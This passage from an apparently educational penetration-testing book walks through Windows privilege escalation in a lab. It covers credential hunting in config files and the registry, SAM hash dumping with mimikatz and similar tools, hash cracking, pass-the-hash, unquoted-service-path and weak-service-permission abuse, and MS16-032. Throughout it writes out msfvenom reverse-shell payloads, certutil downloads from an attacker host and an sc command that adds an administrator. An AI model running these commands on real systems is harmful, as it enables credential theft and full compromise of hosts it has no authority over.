    <AutoLogon>

     <Password>UGFzc3dvcmQxMjM=</Password>

     <Enabled>true</Enabled>

     <Username>Administrator</Username>

    </AutoLogon>

    <UserAccounts>

     <LocalAccounts>

      <LocalAccount wcm:action="add">

       <Password>*SENSITIVE*DATA*DELETED*</Password>

       <Group>administrators;users</Group>

       <Name>Administrator</Name>

      </LocalAccount>

     </LocalAccounts>

    </UserAccounts>

The encrypted password can be decrypted using the built-in base64 utility on Kali Linux. This can be done by running the following command:

echo "<ENCRYPTED-PASSWORD>" | base64 -d

Windows installations can also be automated using a Windows utility called Sysprep. Sysprep is used to deploy Windows images to different systems and can also be used in conjunction with the Windows Unattended Setup utility to prepare the image for deployment.

Similarly, Sysprep also utilizes configuration files that contain customizations and user credentials. If these files are not cleaned up, they can reveal useful credentials. The name of the configuration file will vary based on the version of Windows that's been installed. The file typically has one of the following names:

- Sysprep.inf

- Sysprep.xml

The location of the configuration file will also depend on the version of Windows that's been installed and can typically be found under one of the following locations:

C:\\sysprep.inf

C:\\sysprep\sysprep.xml

As highlighted in the following screenshot, If the configuration file exists, it should contain the administrator password in cleartext:

Figure 7.4 – Sysprep.xml password

If these configuration files exist, they offer a straightforward path to authenticate to the system as the admin user attains elevated privileges.

The next point of interest in Windows is its registry. The Windows Registry is a database that is responsible for storing settings and configurations for Windows and other applications installed on the system. We can search the registry for specific strings to reveal user credentials. This can be done by running the following commands:

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

As highlighted in the following screenshot, this will output all the registry entries that match the password string:

Figure 7.5 – Windows Registry search

In this particular case, we did not find anything of interest. As a result, we will now turn our attention to finding and enumerating application-specific passwords.

Searching for application passwords

Applications are an enticing target for attackers when they have weaknesses and vulnerabilities in them. How they store credentials can lead to complete system compromise or elevated privileges.

This section will focus on finding and enumerating application credentials. The techniques demonstrated in this section will depend on the type of target you are dealing with and its deployment use case. In our particular case, our target virtual machine has been set up as a server and has various applications installed on it.

In Chapter 3, Gaining Access (Exploitation), we performed a comprehensive Nmap scan on our target and identified several applications, most of which were web applications that utilize some form of authentication. These are some of the applications we can target:

MySQL Server
phpMyAdmin
WordPress

Let's learn how to find and identify the configuration files that are used to store credentials by these applications:

The first step in this process is to identify the web hosting stack being used. As highlighted in the following screenshot, navigating to the root of the filesystem reveals that the hosting stack that's been installed is Windows Apache MySQL PHP (WAMP):

Figure 7.6 – WAMP

We can explore the contents of the wamp directory to determine what web applications are being hosted. This can be done by running the following command:

cd wamp\www\

As highlighted in the following screenshot, the contents of the directory reveal that WordPress has been installed on the server:

Figure 7.7 – WordPress directory

WordPress is a content management system that requires a database – in this case, MySQL – to store data and user credentials. Connecting to the database is facilitated through a remote connection, and the database access credentials are stored in the wp-config.php file. We can list the contents of this file by navigating into the WordPress installation directory and running the following command in the Windows command shell:

type wp-config.php

As highlighted in the following screenshot, the content of the file reveals the MySQL username and password combination that we can use to log in:

Figure 7.8 – wp-config.php MySQL credentials

In this case, we can get the root username and password for the MySQL server and log in remotely from Kali by running the following command:

mysql -u root -p -h <TARGET-IP>

As highlighted in the following screenshot, after successful authentication, we should now have root access to the MySQL Server and view and dump the contents of any database on the server:

Figure 7.9 – MySQL login

We can now dump the list of databases on the server. This can be done by running the following command in the MySQL prompt:

show databases;

As highlighted in the following screenshot, the command will output a list of databases on the server:

Figure 7.10 – MySQL databases

We can dump the contents of the WordPress database by running the following command in the MySQL prompt:

use wordpress;

This reveals a list of tables in the WordPress database. We can dump the user credentials for the WordPress installation by running the following command:

select * from wp_users;

As highlighted in the following screenshot, this will reveal the WordPress user's credentials:

Figure 7.11 – WordPress credentials

The user passwords are encrypted in MD5 and can be decrypted to reveal the cleartext password.

Additionally, given the fact that we have root access to the MySQL server, we can change the password for the admin account by running the following command:

update wp_users set user_pass = MD5('password123!') where ID = 1;

We can now log into the WordPress admin dashboard with the password we have just set and should have administrative control over the WordPress site.

So far, we have taken control of the MySQL Server and the WordPress site. Now, let's find the credentials of the other applications.

The server is also running phpMyAdmin. We can gain access to the phpMyAdmin control panel by accessing the content of the file, as follows:

C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.ini.php

As highlighted in the following screenshot, this will reveal the access credentials for the phpMyAdmin control panel:

Figure 7.12 – phpMyAdmin credentials

We should now have root access to the phpMyAdmin control panel and be able to create, modify, and delete the contents of databases.

Now that we have taken control of the MySQL Server and the WordPress site, we can start dumping Windows user account hashes to elevate our privileges.

Dumping Windows hashes

In this section, we will take a closer look at Windows passwords and how they are hashed. The hash dumping process on Windows can be performed by using various techniques and tools, most of which we will explore in this section. Before we begin using any tools or techniques, we need to take a brief look at how Windows passwords are stored.

SAM database

Security Account Manager (SAM) is a database that is responsible for managing user accounts and passwords on Windows. All the passwords that are stored in the SAM database are hashed. Authentication and verification of user credentials is facilitated by the local security authority (LSA).

The SAM database is stored in the Windows Registry and can be accessed from the following location:

HKEY_LOCAL_MACHINE\SAM

Now that we know where Windows user credentials are stored, we need to take a closer look at LanMan (LM) and NTLM authentication.

LM and NTLM hashing

LM is an authentication protocol that's developed by IBM and widely implemented in Windows operating systems prior to NT4.0. The protocol is used to encrypt user passwords, and the hashing process can be broken down into the following steps:

The password is converted into a hash by breaking it into two seven-character chunks.
All characters are then converted into uppercase.
Each chunk is then encrypted with a 56-bit DES key.

LM is generally considered to be a weak protocol and can easily be cracked, primarily because of the following reasons:

The 56-bit DES key is weak and can be cracked relatively easily.
Because the characters are converted into uppercase, this makes the cracking process relatively simple through a brute-force or dictionary attack.
Versions of Windows that utilize LM are restricted to a maximum of 14 characters for user account passwords.

Now that we understand how LM hashing works, we can look at NTLM hashing, which is an improvement in terms of security over LM.

NTLM is a collection of authentication protocols that are utilized in Windows to facilitate authentication between computers. The authentication process involves using a valid username and password to authenticate successfully.

NTLM authentication operates under the client-server model of communication and involves a handshake process, similar to the TCP three-way handshake. We explored the NTLM authentication process in the previous chapter, so we will only be exploring the differences between LM and NTLM hashing here.

NTLM operates under a challenge response system, and the hashing process can be broken down into the following steps:

When a user account is created, it is encrypted using the MD4 hashing algorithm, while the original password is disposed of.
During authentication, the username is sent to the server. The server then creates a 16-byte random string and sends it to the client. This is known as the challenge.
The client encrypts the string with the password hash using the Data Encryption Standard (DES) algorithm and sends it back to the server. This is known as the response.
The server then compares the hashed string (response) to the original. If it matches, authentication is completed.

The following table highlights the key differences between LM and NTLM and how each protocol handles encryption:

Now that we understand how LM and NTLM hashing works, we can begin exploring the process of dumping hashes on our target system.

Utilizing PwDump7

The first tool we will be utilizing is called PwDump7.exe. It is a Windows binary that extracts the SAM database and dumps the hashes. It needs to be run locally on the target system. You can download the binary from this link: https://www.tarasco.org/security/pwdump_7/.

After downloading the binary, we need to transfer it to the target system. This can be done automatically through meterpreter by running the following command in the meterpreter shell:

upload ~/Downloads/pwdump7/PwDump7.exe

Alternatively, if you are running a standard command shell, we will need to set up a web server on our Kali VM. This will be used to host the binary so that we can download it on the target system. This can be done by following the procedure outlined here.

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the PwDump7.exe binary is stored:

sudo python -m SimpleHTTPServer 80

To download the PwDump7.exe binary on the target system, we can utilize the certutil utility. However, before we can download the binary, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the current user's Desktop directory.

We can now use the certutil utility to download the binary from the Kali VM onto our target system. This can be done by running the following command on the target system:

certutil -urlcache -f http://<KALI-VM-IP>/PwDump7.exe PwDump7.exe

As shown in the following screenshot, if the transfer is successful, the binary should be downloaded and saved with the name we specified:

Figure 7.13 – certutil successful transfer

We can also save the registry values of the SAM file manually on the target system and use the PwDdump utility to dump the hashes. This can be done by running the following command:

reg save hklm\sam c:\sam

If the operation was successful, you should receive a message similar to the one highlighted in the following screenshot:

Figure 7.14 – Dump SAM

We can now execute the binary to dump the hashes by running the following command:

.\PwDump7.exe -s <SAMFILE> <SYSTEM-FILE>

This will dump the Windows hashes from the SAM database, which we will crack in the next section.

In the case of our target system, this technique will not work. However, it is a useful utility and will work on most versions of Windows.

Utilizing SamDump2

We can also save the registry values of the SAM file manually on the target system and use the SamDump2 utility to dump the hashes. This can be done by running the following command:

reg save hklm\sam c:\sam

If the operation was successful, you should receive a message similar to the one highlighted in the following screenshot:

Figure 7.15 – Dump SAM

We can now download the SAM file from the root of the filesystem to our Kali VM. This can be done automatically through meterpreter by running the following command:

download sam

As highlighted in the following screenshot, the SAM file should be downloaded to our home directory on Kali:

Figure 7.16 – Downloading the SAM file

We can now use the SamDump2 utility on Kali Linux to dump the hashes from the file. This can be done by running the following command on Kali:

samdump2 system sam

This will dump the hashes from the SAM file, which we can now crack to obtain the cleartext password.

This process can also be automated using the hashdump meterpreter command, like so:

hashdump

If successful, the output should reveal all the user account hashes on the system, as highlighted in the following screenshot:

Figure 7.17 – Hashdump

In this particular case, the hashdump command gives us all the user account hashes on the system. We can save the hashes into a file called hashes.txt on our Kali virtual machine. We will take a look at how to use these hashes in the next section.

Utilizing Windows Credentials Editor

Another great utility we can use to dump password hashes is the Windows Credentials Editor, also known as WCE. WCE lists logon sessions and their corresponding NTLM hashes. The binary comes pre-packaged with Kali and will need to be run locally on the target system.

We can upload the binary to the target using meterpreter by running the following command:

upload /usr/share/windows-resources/wce/wce64.exe

In the event you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

After transferring the binary to the target system, we can execute the binary by running the following command:

.\wce64.exe

This will output a list of logon sessions and their corresponding hashes, as shown in the following screenshot:

Figure 7.18 – WCE hashes

In this particular case, we were only able to dump the hashes for the currently logged on users.

We can also use the wce.exe binary to dump the password hashes and their corresponding cleartext equivalents. This can be done by running the following command:

.\wce64.exe -w

In this particular case, we retrieved the hashes and cleartext passwords for the vagrant user and the SSH user, as shown in the following screenshot:

Figure 7.19 – WCE cleartext passwords

We can also use another great Metasploit post-exploitation module to dump password hashes and access tokens from the system. This can be done by loading the following module after putting your meterpreter session in the background:

use post/windows/gather/credential/credential_collector

Now, we need to configure the module and change the relevant module options. In this case, the only option that needs to be configured is the SESSION option. We can set the SESSION option by running the following command:

set SESSION <SESSION-ID>

The following screenshot outlines the module option that needs to be configured in order to run the module:

Figure 7.20 – Module options

Now, we can run the module by running the following command in the Metasploit console:

run

If successful, the module should output a list of password hashes and access tokens that can be utilized to elevate our privileges, as shown in the following screenshot:

Figure 7.21 – Credential editor

In this case, we obtained all the user account hashes from the target system. We will take a look at how to utilize these hashes in the next section.

Utilizing mimikatz

We can also utilize the built-in Mimikatz meterpreter module (also known as kiwi). This can be loaded into meterpreter by running the following command:

load kiwi

Once the module has been loaded, we can dump the contents of the SAM database by running the following command in the meterpreter session:

lsa_dump_sam

This will output a list of all user accounts and their corresponding NTLM hashes, as shown in the following screenshot:

Figure 7.22 – Mimikatz hashes

Note

Mimikatz is an open source application that allows attackers to view and save Windows authentication credentials for the purpose of privilege escalation.

Alternatively, you can utilize the Mimikatz executable that comes pre-packaged with Kali Linux. The binary will need to be run locally on the target system and can be automatically uploaded to the target through meterpreter by running the following command:

upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

In the event you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

Note

Mimikatz requires an elevated shell in order to dump hashes.

After transferring the binary to the target system, we can execute the binary by running the following command:

.\mimikatz.exe

After executing the binary, we will need elevated permissions in order to access the SAM database. This can be done by running the following commands within the Mimikatz prompt:

token::elevate

We can now dump the contents of the SAM database by running the following command in the Mimikatz prompt:

lsadump_sam

If successful, you should retrieve the dumped hashes from the SAM database, as highlighted in the following screenshot:

Figure 7.23 – Mimikatz hash dump

You should now have access to various password hashes for various accounts. However, the account we are interested in is the administrator account as it will provide us with a direct route to elevate our privileges to the highest level.

In the next section, we will begin the process of cracking the password hashes and learn how we can utilize the passwords for authentication.

Cracking Windows hashes

We can now use the password hashes we dumped in the previous section for legitimate authentication. However, before we do that, we still need to crack these hashes to obtain the cleartext passwords.

This section will be split into two main subsections. The first part will go over the process of cracking Windows password hashes with John the Ripper, while the second subsection will cover the process of authentication.

Before we can begin dumping and cracking password hashes, we need to take a look at the structure of a typical Windows hash.

As highlighted in the following screenshot, the hash ID is broken down into four sections:

Figure 7.24 – Hash structure

The four sections can be further classified as follows:

The first section is the username.
The second section is the unique RID.
The third section is the LM hash.
The fourth section is the NTLM hash.

Now that we understand what makes up a Windows hash, we can begin the hash cracking process.

Cracking Windows hashes with John the Ripper

John the Ripper is an open source password security, auditing, and recovery utility that supports a large number of hashes and ciphers. In our case, we will be utilizing John the Ripper to crack Windows NTLM hashes.

John the Ripper comes pre-packaged with Kali Linux, and the first step involves saving the password hashes we dumped in the hash dumping section into a file on Kali Linux, preferably a .txt file.

In our case, we will name the file hashes.txt and save the file on our Desktop directory on Kali Linux.

The contents of your file should like similar to the following:

Figure 7.25 – NTLM hashes

Note

The NTLM hashes should not be on the same line, and no other text or strings should be included in the hash file.

We can now begin the hash cracking process with John the Ripper by running the following command in Kali Linux:

sudo john –format=NT hashes.txt

This will initiate the hash cracking process; any cracked hashes will be output with their corresponding password. It is important to note that, depending on the length and strength of the passwords, the cracking process may take a few minutes to a couple of hours or even days.

You may also want to limit the number of hashes in the hash file to the hashes that are the most important, or even the hash for the administrator account.

In this particular case, John cracked the hashes for the Administrator and vagrant user accounts, as highlighted in the following screenshot:

Figure 7.26 – Cracked hashes

Now that we have obtained the cleartext password for the administrator account, we can begin the authentication process.

Authentication

We can use the dumped hashes and cleartext passwords to authenticate with the target to obtain privileged access. This process can be facilitated through various techniques. We will be taking a look at some of them in this subsection.

Using the pass the hash technique

The first technique we will be using is known as pass the hash. It involves authenticating with a target using the dumped hash – in this case, the administrator hash. This attack can be automated with a Metasploit module that leverages the PsExec command-line utility on Windows. This utility allows you to execute programs on remote systems.

We can load the module in Metasploit after putting our meterpreter session in the background by running the following command:

use exploit/windows/smb/psexec

After loading the module, we need to configure the module options. In this case, we need to configure the RHOSTS option and configure the Server Message Block (SMB) credentials. We set SMBUser to Administrator and the SMBPass option to the administrator hash, as highlighted in the following screenshot:

Figure 7.27 – psexec module options

After configuring the module options, we can launch the module by running the following command in the Metasploit console:

run

As highlighted in the following screenshot, if the module runs successfully, we should receive a meterpreter session with elevated privileges:

Figure 7.28 – Pass the hash was successful

With that, we've successfully elevated our privileges by utilizing password hashes.

Using Remmina

During the initial Nmap scan of our target, we identified the Remote Desktop Protocol (RDP) service running on the default configured port; that is, 3389. We can utilize the cleartext password we cracked for the administrator account to authenticate with the server and initiate a remote desktop connection with elevated privileges.

This can be facilitated by using an RDP client such as Remmina, which comes pre-packaged with Kali Linux.

You can launch Remmina through the application launcher menu or through the Terminal. Once you've done this, you will need to enter the target IP address, as shown in the following screenshot:

Figure 7.29 – Remmina IP specification

After specifying the target IP, you will be prompted to provide credentials for authentication. In this case, we will use the administrator credentials, as shown in the following screenshot:

Figure 7.30 – Remmina credentials

If authentication is successful, we should receive a remote desktop session and should be logged in as the administrator account with elevated privileges, as highlighted in the following screenshot:

Figure 7.31 – Remmina RDP session

With that, we've successfully elevated our privileges with the passwords hashes we dumped and cracked.

You should now be familiar with the process of searching for and identifying passwords in files, as well as the process of dumping and cracking Windows NTLM hashes for the purpose of elevating privileges.

Summary

In this chapter, we learned how to find and identify passwords in Windows configuration files, before looking at the various utilities that can be used to search for specific strings. We also touched on how to find and identify application passwords in configuration files, and how these credentials can be used to extend our domain of control. We ended this chapter by taking an in-depth look at how to dump Windows NTLM hashes and how to crack them to elevate our privileges.

In the next chapter, we will explore the process of privilege escalation through exploiting various Windows services.

===== FILE 14/21: B17389_08_Final_PG_ePub.xhtml =====

Chapter 8: Exploiting Services

Now that you have a good grasp of the common privilege escalation attack vectors on Windows, we can take a deeper look at Windows services and begin exploring the privilege escalation techniques that leverage vulnerabilities and misconfigurations in services in order to elevate our privileges on the target system. The objective of this chapter is to identify and exploit vulnerabilities and misconfigurations in common Windows services.

We will explore the process of identifying and exploiting unquoted service paths and weak service permissions, and we will then take a look at how to exploit the Windows secondary logon in order to elevate our privileges. We will also take an in-depth look at the process of identifying and hijacking missing Dynamic Link Libraries (DLLs).

In this chapter, we're going to cover the following main topics:

Exploiting services and misconfigurations
Exploiting unquoted service paths
Exploiting secondary logon
Exploiting weak service permissions
DLL hijacking
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you are familiar with Windows CMD commands.

You can view this chapter's code in action here: https://bit.ly/3utJTyI

Exploiting services and misconfigurations

Windows utilizes various services to manage and maintain standard system functionality, such as starting services, configuring start up programs, authentication, and software installation, to name a few. Our objective is to find vulnerabilities and misconfigurations in these services in order to elevate our privileges.

This process is dynamic and, as a result, will depend on the target configuration and deployment use case, primarily because the techniques involved in this process will depend on the implementation and configuration of particular services.

Given the robust nature of this process and the techniques used, we will be utilizing the Metasploitable3 virtual machine that we set up in Chapter 2, Setting Up Our Lab, of this book.

This is because the Metasploitable3 virtual machine runs on Windows Server 2008 and has been configured to be run as a server, as well as hosting various services and applications.

This robust configuration of applications provides a great real-world scenario for a practical demonstration of the tools and techniques that we will be using in this chapter.

Before we begin, ensure that you have a foothold on the target system and have access through a command shell or Meterpreter session.

The techniques and tools used in this chapter will involve utilizing native Windows commands and specific Meterpreter modules to automate various aspects of the process.

Exploiting unquoted service paths

When starting or running services, Windows requires the location of the target executable in order to run. The path of the executable is typically encapsulated by quotation marks, which allows Windows to locate the path or location of the executable. The following path is an example of a secure service path:

"C:\Program Files\OpenSSH\bin\cygrunsrv.exe"

If the path of the executable is not encapsulated by quotation marks, Windows will resort to searching for the executable in every directory and executing each one until it locates the target executable. We can leverage this vulnerability to elevate our privileges by identifying a service that runs under administrative privileges and that is not encapsulated in quotation marks. The following path is an example of an insecure service path that we can exploit:

C:\Program Files\OpenSSH\bin\cygrunsrv.exe

The exploitation process involves generating and uploading a binary to the target system, which will provide us with an elevated reverse shell or Meterpreter session when executed.

This technique can be recreated by following this procedure:

The first step in this process involves identifying a service path that is not encapsulated by quotation marks, which can be done by utilizing the Windows Management Instrumentation (WMIC) interface in conjunction with the findstr utility. This can be done by running the following command in the Windows command shell on the target system:

wmic service get name,displayname,pathname,startmode |findstr /i /v "c:\" |findstr /i /v """

This command will output a list of services with unquoted service paths; in our case, we were able to identify a plethora of services with unquoted paths that we can exploit. As highlighted in the following screenshot, we can use the OpenSSH service path:

Figure 8.1 – Finding unquoted service paths

The reason we are utilizing the OpenSSH service is that the service requires administrative privileges to run and, as a result, is executed under the administrative user.

The next step involves checking the directory permissions in order to determine whether we can write or make changes to the OpenSSH service directory. We can check the permissions of the directory by utilizing the Integrity Control Access Control Lists (icacls) utility by running the following command:

icacls "C:\Program Files\OpenSSH"

As highlighted in the following screenshot, this will output the directory permissions; in this case, standard users on the system have write permissions, therefore giving us the ability to make changes to the contents of the directory as we are part of the BUILTIN\Users group:

Figure 8.2 – Service path permissions

We can leverage this misconfiguration to elevate our privileges by replacing the OpenSSH executable with a reverse shell binary. Once the OpenSSH service has been started or restarted, the reverse shell binary will be executed instead of the OpenSSH executable.

Tip

The reverse shell payload should have the same name as the service we are trying to exploit and should be uploaded to the respective service path we identified earlier.

We can generate the Meterpreter payload with msfvenom and save it as an executable. This can be done by running the following command in Kali:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LISTENER-IP> LPORT=<PORT> -f exe > /home/kali/Desktop/cygrunsrv.exe

After generating the payload, we can upload it to the OpenSSH service path, as follows:

C:\Program Files\OpenSSH\bin

Before we can upload the Meterpreter payload, we need to change the name of the original binary. However, it is recommended to take a backup of the original binary in the event that the process does not work as expected. The original executable can be deleted by running the following command in the Meterpreter session:

rm cygrunsrv.exe

We can now upload the Meterpreter executable to the OpenSSH service path on the target using Meterpreter by running the following command:

upload /home/kali/Desktop/cygrunsrv.exe

In the event you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

As illustrated in the following screenshot, this will upload the Meterpreter executable to the OpenSSH service path:

Figure 8.3 – Uploading the Meterpreter payload

We now need to set up the Meterpreter listener with Metasploit. This can be done by running the following command in the Metasploit console:

use /exploit/multi/handler

The next step involves specifying the payload we used to create the binary with msfvenom. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

We now need to configure the module options. In this case, we need to configure the LHOST and LPORT options as highlighted in the following screenshot:

Figure 8.4 – Meterpreter payload options

After setting the module options, we can start the listener by running the following command:

run

The listener will listen for any incoming connections from the payload we generated with msfvenom.

In order to execute the Meterpreter executable, we need to restart the OpenSSH service. This can be done by running the following commands in the Windows command shell:

sc stop OpenSSHd

sc start OpenSSHd

As illustrated in the following screenshot, this will restart the OpenSSH service and in turn, we should receive a privileged Meterpreter session on our listener:

Figure 8.5 – Meterpreter session

We can verify that we have an elevated Meterpreter session by running the following command:

getuid

As illustrated in the following screenshot, we have successfully elevated our privileges and should have a Meterpreter session with administrative privileges:

Figure 8.6 – Unquoted service path Meterpreter privileges

We can also automate the process by using a Metasploit module to identify and exploit a target service with an unquoted service path and automatically upload a reverse shell payload that will provide us with an elevated Meterpreter session. This can be done by running the following command in the Metasploit console:

use exploit/windows/local/unquoted_service_path

After loading the module, we need to configure the module options. In this case, we need to configure the SESSION ID and target payload as highlighted in the following screenshot:

Figure 8.7 – Unquoted service path module options

After configuring the module options, we can launch the module by running the following command in the Metasploit console:

run

As highlighted in the following screenshot, if the module runs successfully, we should receive a Meterpreter session with elevated privileges:

Figure 8.8 – Unquoted service path Meterpreter session

We can verify that we have an elevated Meterpreter session by running the following command:

getuid

As highlighted in the following screenshot, we have successfully elevated our privileges and should have a Meterpreter session with administrative privileges:

Figure 8.9 – Unquoted service path Meterpreter privileges

We have now been able to successfully elevate our privileges through unquoted service paths and can explore the process of exploiting the secondary logon handle.

Exploiting secondary logon

The secondary logon is a Windows service that is used by administrators to perform administrative tasks through a standard system account. This service can be exploited through an inherent vulnerability that affects the following versions of Windows:

Windows 7
Windows Server 2008
Windows 8.1
Windows Server 2012
Windows 10

The exploitation process leverages the lack of sanitization of handles in the secondary logon service, which can allow a user to duplicate a system service thread handle.

In this section, we will take a look at how to exploit this vulnerability both manually and automatically using the Metasploit framework. It is important to note, however, that the exploit requires certain dependencies to be met in order for this process to work:

The target system should have two or more CPU cores.
The target system should be running PowerShell V2.0 or later.

More information regarding this exploit can be found here: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032.

Before we begin, ensure that you have a foothold on the target system and have access through a command shell or Meterpreter session.

Now that we have an understanding of how the exploitation process works, we can take a look at how to exploit the vulnerability to elevate our privileges:

We have already taken an in-depth look at how to search for and identify exploits in Chapter 4, Performing Local Enumeration, and were able to deduce that the Metasploitable3 virtual machine is vulnerable to this attack. We can begin the process by utilizing a Metasploit module that automates the exploitation process. This can be done by loading the following module in the Metasploit console:

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

After loading the module, we need to configure the module options. In this case, we need to set the default payload, session ID, LPORT, and LHOST options, as highlighted in the following screenshot:

Figure 8.10 – Secondary logon handle module options

After configuring the module options, we can launch the module by running the following command in the Metasploit console:

run

As illustrated in the following screenshot, if the module runs successfully, we should receive a Meterpreter session with elevated privileges:

Figure 8.11 – Secondary logon handle exploit successful

We can verify that we have an elevated Meterpreter session by running the following command:

getuid

As illustrated in the following screenshot, we have successfully elevated our privileges and should have a Meterpreter session with administrative privileges:

Figure 8.12 – Secondary logon handle Meterpreter privileges

Alternatively, if you do not have access to the target through a Meterpreter session, you can compile the exploit and transfer it to the target. The pre-built exploit binaries for this vulnerability can be found here: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032.

As highlighted in the following screenshot, the GitHub repository contains a PowerShell script and pre-built binaries for both x64- and x86-based systems:

Figure 8.13 – MS16_032 GitHub repository

It is, however, recommended to analyze and compile the exploit code yourself. The source code for the exploit can be found here: https://github.com/khr0x40sh/ms16-032.

After downloading or compiling the binary, we need to transfer it to the target system. This can be done by following the procedure outlined here:

To set up a web server on our Kali virtual machine, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the ms16-032.exe binary is stored:

sudo python -m SimpleHTTPServer 80

Alternatively, you can also utilize the Python 3 http.server module by running the following command:

sudo python3 -m http.server 80

We can now use the certutil utility to download the binary from the Kali virtual machine to our target system. This can be done by running the following command on the target system:

certutil -urlcache -f http://<KALI-VM-IP>/ms16-032.exe ms16-032.exe

We can now execute the ms16-032.exe binary. This can be done by running the following command:

.\ms-16-032.exe

If the binary runs successfully, you should receive output similar to the output highlighted in the following screenshot:

Figure 8.14 – MS16-032 manual exploitation

We have been able to successfully elevate our privileges by exploiting the secondary logon service both manually and automatically.

We can now take a look at how to identify and exploit weak service permissions to elevate our privileges.

Exploiting weak service permissions

This exploit involves leveraging improperly configured service permissions in order to elevate our privileges. The objective of this process is to identify services that run with SYSTEM or administrative privileges and use the improper permission configurations for the service to execute arbitrary commands through the BINARY_PATH_NAME parameter.

We can exploit this vulnerability to add a standard user to the local administrators group and consequently achieve an elevated state on the system.

The exploitation process can be performed by following these steps:

The first step in the process involves identifying services and applications that standard users have access to. This can be facilitated through the use of the accesschk utility that is found in the Sysinternals suite. The accesschk executable can be downloaded from here: https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk.
After downloading the accesschk executable to our Kali virtual machine, we will need to transfer it to the target system. This can be done through Meterpreter by running the following command:

upload /<PATH-TO-EXECUTABLE/accesschk64.exe

In the event that you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

After uploading the accesschk.exe binary to the target system, we can enumerate a list of services that standard users have access to by running the following command:

.\accesschk64.exe -uwcqv "vagrant" * -accepteula

In our case, we will use the standard vagrant user. As highlighted in the following screenshot, the command should output a list of services that have SERVICE_ALL_ACCESS permissions:

Note

The SERVICE_ALL_ACCESS permission allows any user on the system to take control of and modify the parameters of the service.

Figure 8.15 – accesschk results

We are able to identify a plethora of services with SERVICE_ALL_ACCESS permissions. In our case, we will be targeting the OpenSSH service primarily because we were able to identify that it runs with SYSTEM or administrative privileges.

The next step involves enumerating additional information regarding the service and its respective parameters. This can be done by running the following command in the Windows command shell:

sc qc OpenSSHd

As highlighted in the following screenshot, the command will output information about the service and its parameters:

Figure 8.16 – Service parameters

We can modify BINARY_PATH_NAME to execute arbitrary commands. In our case, we will be adding the vagrant user to the local administrators group. This can be done by running the following command:

sc config "OpenSSHd" binPath= "net localgroup administrators vagrant /add"

As highlighted in the following screenshot, if the operation runs successfully, the vagrant user account will be added to the local administrators group and should have administrative privileges:

Figure 8.17 – Modifying the binary path

After modifying the binary path parameter, we need to restart the OpenSSH service. This can be done by running the following commands in the Windows command shell:

sc stop OpenSSHd

sc start OpenSSHd

We can verify that the vagrant user account has been added to the local administrators group by running the following command in the Windows command shell:

net localgroup administrators

As highlighted in the following screenshot, the vagrant user account is now a member of the local administrators group and has administrative privileges:

Figure 8.18 – Local administrator's group members

This process can also be automated through the use of a Metasploit module named exploit/windows/local/service_permissions. We can load the module by running the following command in the Metasploit console:

use exploit/windows/local/service_permissions

After loading the module, we need to configure the module options. In this case, we need to set the default payload, LHOST, LPORT, and the session ID option, as highlighted in the following screenshot:

Figure 8.19 – Service permissions module options

After configuring the module options, we can launch the module by running the following command in the Metasploit console:

run

As highlighted in the following screenshot, if the module runs successfully, we should receive a Meterpreter session with elevated privileges:

Figure 8.20 – Service permissions module Meterpreter session

We can verify that we have an elevated Meterpreter session by running the following command:

getuid

As illustrated in the following screenshot, we have successfully elevated our privileges and should have a Meterpreter session with administrative privileges:

Figure 8.21 – Service permissions Meterpreter privileges

We have been able to successfully elevate our privileges by exploiting weak service permissions both manually and automatically.

We can now take a look at the process of DLL hijacking and how it can be leveraged to elevate our privileges.

DLL hijacking

Windows DLLs are libraries that are used or called when applications or services are started. If the application or service cannot locate the required DLLs, we can force the application or service to load our own DLL that will run arbitrary commands in order to elevate our privileges.

For this to work, we must first locate an application that runs with SYSTEM privileges and must have the appropriate path permissions that can allow us to upload our custom DLL.

Applications can load DLLs from various paths on Windows and will typically follow this order:

Application path or directory
C:\Windows\System32
C:\Windows\System
C:\Windows
C:\Program Files
The PATH environment variable

We can also perform DLL hijacking on application or service DLLs that do not have a defined path. The following code snippet is an example of an absolute path:

PATH = C:\Windows\System32\example.dll

As you can see in the preceding code snippet, the path to the DLL is specified and as a result, the application or service knows exactly where to locate it. The following code snippet is an example of an undefined application or service DLL path that can be exploited:

PATH = example.dll

In order to understand how this works, let's take a look at a scenario that will explain and demonstrate the process in greater depth.

Setting up our environment

In this section, we will be utilizing the Windows 7 SP1 virtual machine that we set up in Chapter 2, Setting Up Our Lab, of this book. We will also be setting up a vulnerable service that will be used to demonstrate the DLL hijacking process.

To begin setting up your environment, follow this procedure:

The first step in the process will involve downloading and running a Windows batch script on the Windows 7 virtual machine. The script can be downloaded from this link: https://raw.githubusercontent.com/sagishahar/lpeworkshop/master/lpe_windows_setup.bat.

This script will be responsible for setting up the various vulnerable services that will be used in the demonstrations in this chapter.

After downloading the batch script, you will need to execute it with administrative privileges as highlighted in the following screenshot:

Figure 8.22 – Setup script execution options

After the script has been executed, it will begin setting up the various vulnerable services that we will be using in this section. After the setup process is completed, you will be prompted to restart the system as illustrated in the following screenshot:

Figure 8.23 – Setup script complete

After restarting the system, we will need to start the vulnerable DLL service. This can be done by running the following command in the Windows command prompt on the target virtual machine:

sc start dllsvc

As illustrated in the following screenshot, if the initial setup process was run successfully, the service should be executed without any issues:

Figure 8.24 – Starting the vulnerable DLL service

After starting the dllsrv service, our vulnerable services should be up and running and we should be able to move on to the exploitation phase.

The DLL exploitation process

Now that we have our target system configured with the various vulnerable services, we can begin the DLL hijacking process.

Before we commence with the demonstrations, ensure that you have established an initial foothold on the target system:

